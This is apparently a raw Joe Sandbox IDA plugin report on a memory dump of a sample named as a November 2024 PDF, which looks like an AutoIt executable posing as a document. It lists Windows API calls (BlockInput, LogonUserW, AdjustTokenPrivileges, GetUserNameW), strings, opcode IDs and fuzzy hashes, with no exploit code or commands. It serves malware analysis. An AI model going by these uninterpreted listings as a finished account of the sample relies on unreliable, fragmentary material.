                                                                                                                      • FreeSid.ADVAPI32(?), ref: 007B4C53
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3429775523-0
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 007BC966
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 007BC996
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2295610775-0
                                                                                                                      APIs
                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,007C977D,?,007DFB84,?), ref: 007BA302
                                                                                                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,007C977D,?,007DFB84,?), ref: 007BA314
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFormatLastMessage
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3479602957-0
                                                                                                                      APIs
                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007A8851), ref: 007A8728
                                                                                                                      • CloseHandle.KERNEL32(?,?,007A8851), ref: 007A873A
                                                                                                                      Similarity
                                                                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 81990902-0
                                                                                                                      APIs
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00778F97,?,?,?,00000001), ref: 0077A39A
                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0077A3A3
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3192549508-0
                                                                                                                      Strings
                                                                                                                      • Variable must be of type 'Object'., xrefs: 0079428C
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Variable must be of type 'Object'.
                                                                                                                      • API String ID: 0-109567571
                                                                                                                      APIs
                                                                                                                      • __time64.LIBCMT ref: 007B8B25
                                                                                                                        • Part of subcall function 0077543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,007B91F8,00000000,?,?,?,?,007B93A9,00000000,?), ref: 00775443
                                                                                                                        • Part of subcall function 0077543A: __aulldiv.LIBCMT ref: 00775463
                                                                                                                      Similarity
                                                                                                                      • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2893107130-0
                                                                                                                      • Opcode ID: e79040d2bce5b1761fa4c36e41579a66b86743150fa788b75e92b73ea0858e39
                                                                                                                      • Instruction ID: a4f51b083b13fb00dd3338a3dbafc2a415327dd27c9d9538c28be5aef3b48c7c
                                                                                                                      • Opcode Fuzzy Hash: e79040d2bce5b1761fa4c36e41579a66b86743150fa788b75e92b73ea0858e39
                                                                                                                      • Instruction Fuzzy Hash: CC21A272625510CBC729CF39D441B92B3E5EFA5311B288E6CD1E5CB2D0CA74B945CB94
                                                                                                                      APIs
                                                                                                                      • BlockInput.USER32(00000001), ref: 007C4218
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BlockInput
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3456056419-0
                                                                                                                      • Opcode ID: f2d19b52add27c9c65f2106098ce6dc96adae0e09c05748b6fb3bf1eb1f6fb40
                                                                                                                      • Instruction ID: f25e12a49d3109e4e4794ddd70f5f8456b82bf89a5164d1b0120c00e55cec97e
                                                                                                                      • Opcode Fuzzy Hash: f2d19b52add27c9c65f2106098ce6dc96adae0e09c05748b6fb3bf1eb1f6fb40
                                                                                                                      • Instruction Fuzzy Hash: 8CE01A312402149FC710AF69D845E9AB7E8AF94761F00802AFD4AD7252DAB8EC448BA0
                                                                                                                      APIs
                                                                                                                      • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 007B4F18
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: mouse_event
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2434400541-0
                                                                                                                      • Opcode ID: e4e84eb0d5e2061aca56d05e2d10f57b55c52ec0814ad376cdaafc97dd3dc262
                                                                                                                      • Instruction ID: 5e92acceb992b5832d6c9aae0b6e0c2f5411d50a0ad1bc1f4f723b803e2f2196
                                                                                                                      • Opcode Fuzzy Hash: e4e84eb0d5e2061aca56d05e2d10f57b55c52ec0814ad376cdaafc97dd3dc262
                                                                                                                      • Instruction Fuzzy Hash: 11D09EB41646057DFC184F20AC1FFF61219E340791F9C99897202975C398EDA850A035
                                                                                                                      APIs
                                                                                                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,007A88D1), ref: 007A8CB3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LogonUser
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1244722697-0
                                                                                                                      • Opcode ID: 45566dd488d3ba071d984547ad0f5a54157b6ff9c241bc9c1b1c53574ef331fc
                                                                                                                      • Instruction ID: 14337a7d297767fe570a9c8c1a36846ee17671748f66915a7136190f25b3d144
                                                                                                                      • Opcode Fuzzy Hash: 45566dd488d3ba071d984547ad0f5a54157b6ff9c241bc9c1b1c53574ef331fc
                                                                                                                      • Instruction Fuzzy Hash: 63D09E3226450EABEF019EA4DD05EAE3B69EB04B01F408511FE16D61A1C775D935AB60
                                                                                                                      APIs
                                                                                                                      • GetUserNameW.ADVAPI32(?,?), ref: 00792242
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: NameUser
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2645101109-0
                                                                                                                      • Opcode ID: f8ce815924d80b867ffc1b7a6d0ffa7794c62fada4c068369315da917d9a2a03
                                                                                                                      • Instruction ID: 1241e8f3589548e57956a96e004e33970ba1c00c6555140319aa5e2dcd4dbb7d
                                                                                                                      • Opcode Fuzzy Hash: f8ce815924d80b867ffc1b7a6d0ffa7794c62fada4c068369315da917d9a2a03
                                                                                                                      • Instruction Fuzzy Hash: DEC04CF1801109DBDB05DB90D988DFE77BCAB04304F104056E142F2100D7789B448A71
                                                                                                                      APIs
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0077A36A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3192549508-0
                                                                                                                      • Opcode ID: ea86fbdfe1a4eb2f0fc859c6d4a6445623f880ba4b10c49a8aa14688b5b42caa
                                                                                                                      • Instruction ID: 5929bcbe14cb47bef045c3d0c18237c3e1c9010939164d267bc6ccedf9c262b1
                                                                                                                      • Opcode Fuzzy Hash: ea86fbdfe1a4eb2f0fc859c6d4a6445623f880ba4b10c49a8aa14688b5b42caa
                                                                                                                      • Instruction Fuzzy Hash: F6A0113000020CABCA002B8AEC08888BFACEA002A0B008022F80E800228B32A8208A88
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1d09b0d5e38a58e1b81bc6668edb07fd360e0d5bd0baf3c92876e10c46af99d7
                                                                                                                      • Instruction ID: a2a2225215214c7a9b92a0fabe720e89596c33d2e80138d09aabfa90753c6567
                                                                                                                      • Opcode Fuzzy Hash: 1d09b0d5e38a58e1b81bc6668edb07fd360e0d5bd0baf3c92876e10c46af99d7
                                                                                                                      • Instruction Fuzzy Hash: 56223970A01615CBDF688F24C49467D77A1FB82304F6887AADC579B291EB3C9D81CB72
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                      • Instruction ID: d262c96590bf8bd5206a3f2133eec8801aa44f2a1891e442f81f60ba7efc6b3e
                                                                                                                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                      • Instruction Fuzzy Hash: 2FC1C4322061930ADF2D4A3D943503EBAE15EA27F135A8B5DE4BBCB4C5EF28D525D720
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                      • Instruction ID: 468aa242a37ea7c9dbc16326b1b1af8f29312825a6a4f0692cbc85e7f29753ec
                                                                                                                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                      • Instruction Fuzzy Hash: 7EC1E53220519309DF2D4A3E843003EBBE15BA27F135A8B6DE4BADB1D5EF28D525D720
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                      • Instruction ID: 58dbc2762a7282d2135135d1f1f1a01be0815db9c484ea9573882629c6e9efc5
                                                                                                                      • Instruction Fuzzy Hash: 93C1963220619309DF2D4A3D943503EBBE15AA27F139A8B6DE4BBCB5C4EF18D524D720
                                                                                                                      APIs
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 007C7B70
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 007C7B82
                                                                                                                      • DestroyWindow.USER32 ref: 007C7B90
                                                                                                                      • GetDesktopWindow.USER32 ref: 007C7BAA
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 007C7BB1
                                                                                                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 007C7CF2
                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 007C7D02
                                                                                                                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7D4A
                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 007C7D56
                                                                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 007C7D90
                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7DB2
                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7DC5
                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7DD0
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 007C7DD9
                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7DE8
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 007C7DF1
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7DF8
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 007C7E03
                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7E15
                                                                                                                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,007E2CAC,00000000), ref: 007C7E2B
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 007C7E3B
                                                                                                                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 007C7E61
                                                                                                                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 007C7E80
                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7EA2
                                                                                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C808F
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                      • API String ID: 2211948467-2373415609
                                                                                                                      • Opcode ID: f367591440bd5267764872492fc7a8d260ba558efe3800f081f7ff7884dd55dd
                                                                                                                      • Instruction ID: ab5e49b72bfefc9d14f646e2224329ec25cfba1b36f336b2dcf0e157d0879262
                                                                                                                      • Instruction Fuzzy Hash: 4C024871900119EFDB14DFA4CC89EAE7BB9FB48310F14815DF916AB2A1DB78AD01CB60
                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(?,?,007DF910), ref: 007D38AF
                                                                                                                      • IsWindowVisible.USER32(?), ref: 007D38D3
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharUpperVisibleWindow
                                                                                                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                      • API String ID: 4105515805-45149045
                                                                                                                      • Opcode ID: cd7d7281345130de09e12e7bf4cb95ed5911e2c2b917e8c9ad82cf2988ee6212
                                                                                                                      • Instruction ID: 8b01d9eeca92f1c706f21d8061b4509840a5f68ca0353cda3dde0d4a21ed69a0
                                                                                                                      • Instruction Fuzzy Hash: 51D1B830204305DBCB14EF60C855A6E77B5EF94344F14845AF98A5B3E2DB79EE0ACB92
                                                                                                                      APIs
                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 007DA89F
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 007DA8D0
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 007DA8DC
                                                                                                                      • SetBkColor.GDI32(?,000000FF), ref: 007DA8F6
                                                                                                                      • SelectObject.GDI32(?,?), ref: 007DA905
                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 007DA930
                                                                                                                      • GetSysColor.USER32(00000010), ref: 007DA938
                                                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 007DA93F
                                                                                                                      • FrameRect.USER32(?,?,00000000), ref: 007DA94E
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 007DA955
                                                                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 007DA9A0
                                                                                                                      • FillRect.USER32(?,?,?), ref: 007DA9D2
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 007DA9FD
                                                                                                                        • Part of subcall function 007DAB60: GetSysColor.USER32(00000012), ref: 007DAB99
                                                                                                                        • Part of subcall function 007DAB60: SetTextColor.GDI32(?,?), ref: 007DAB9D
                                                                                                                        • Part of subcall function 007DAB60: GetSysColorBrush.USER32(0000000F), ref: 007DABB3
                                                                                                                        • Part of subcall function 007DAB60: GetSysColor.USER32(0000000F), ref: 007DABBE
                                                                                                                        • Part of subcall function 007DAB60: GetSysColor.USER32(00000011), ref: 007DABDB
                                                                                                                        • Part of subcall function 007DAB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 007DABE9
                                                                                                                        • Part of subcall function 007DAB60: SelectObject.GDI32(?,00000000), ref: 007DABFA
                                                                                                                        • Part of subcall function 007DAB60: SetBkColor.GDI32(?,00000000), ref: 007DAC03
                                                                                                                        • Part of subcall function 007DAB60: SelectObject.GDI32(?,?), ref: 007DAC10
                                                                                                                        • Part of subcall function 007DAB60: InflateRect.USER32(?,000000FF,000000FF), ref: 007DAC2F
                                                                                                                        • Part of subcall function 007DAB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007DAC46
                                                                                                                        • Part of subcall function 007DAB60: GetWindowLongW.USER32(00000000,000000F0), ref: 007DAC5B
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4124339563-0
                                                                                                                      • Opcode ID: d13716cf44e682573e2ba508c997f654ebca100e69dd2c596038a503a04dcd53
                                                                                                                      • Instruction ID: 840342510be62a740a33ea2eb94c11e809ac3914ffaf7bdc633036a494e6f197
                                                                                                                      • Instruction Fuzzy Hash: 91A19D72009305FFD7119F64DC08A6B7BB9FF88321F148A2AF963962A0D739D944CB56
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(?,?,?), ref: 00752CA2
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00752CE8
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00752CF3
                                                                                                                      • DestroyIcon.USER32(00000000,?,?,?), ref: 00752CFE
                                                                                                                      • DestroyWindow.USER32(00000000,?,?,?), ref: 00752D09
                                                                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 0078C68B
                                                                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0078C6C4
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0078CAED
                                                                                                                        • Part of subcall function 00751B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00752036,?,00000000,?,?,?,?,007516CB,00000000,?), ref: 00751B9A
                                                                                                                      • SendMessageW.USER32(?,00001053), ref: 0078CB2A
                                                                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0078CB41
                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0078CB57
                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0078CB62
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 464785882-4108050209
                                                                                                                      • Opcode ID: 7b31b49549b8a2557c661cb8f17950815cf1ca586da7d0dcf7981a53544480df
                                                                                                                      • Instruction ID: 21f361f9a3de36c582f28299475abc23eb310aecbc6ce53631f927c8fb127691
                                                                                                                      • Instruction Fuzzy Hash: 9412C030240201EFDB16EF24C888BA9B7F5BF05311F548569E986DB662CB79EC46CB61
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(00000000), ref: 007C77F1
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 007C78B0
                                                                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 007C78EE
                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 007C7900
                                                                                                                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 007C7946
                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 007C7952
                                                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 007C7996
                                                                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 007C79A5
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 007C79B5
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 007C79B9
                                                                                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 007C79C9
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007C79D2
                                                                                                                      • DeleteDC.GDI32(00000000), ref: 007C79DB
                                                                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007C7A07
                                                                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 007C7A1E
                                                                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 007C7A59
                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 007C7A6D
                                                                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 007C7A7E
                                                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 007C7AAE
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 007C7AB9
